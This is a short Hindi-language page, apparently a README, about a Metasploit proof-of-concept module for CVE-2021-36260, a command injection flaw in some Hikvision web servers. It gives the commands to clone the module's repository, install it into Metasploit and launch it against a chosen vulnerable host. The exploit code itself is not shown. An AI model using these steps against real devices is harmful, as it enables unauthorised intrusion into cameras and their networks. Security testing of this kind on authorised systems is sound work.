
CVE-2021-36260 के बारे में Metasploit स्क्रिप्ट (POC)
CVE-2021-36260 के बारे में यह मेटास्प्लॉइट स्क्रिप्ट (POC) है। कुछ Hikvision उत्पादों के वेब सर्वर में एक कमांड इंजेक्शन कमज़ोरी, हमलावर दुर्भावनापूर्ण कमांड वाले संदेश भेजकर कमांड इंजेक्शन हमला करने के लिए इस कमज़ोरी का शोषण कर सकता है।
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
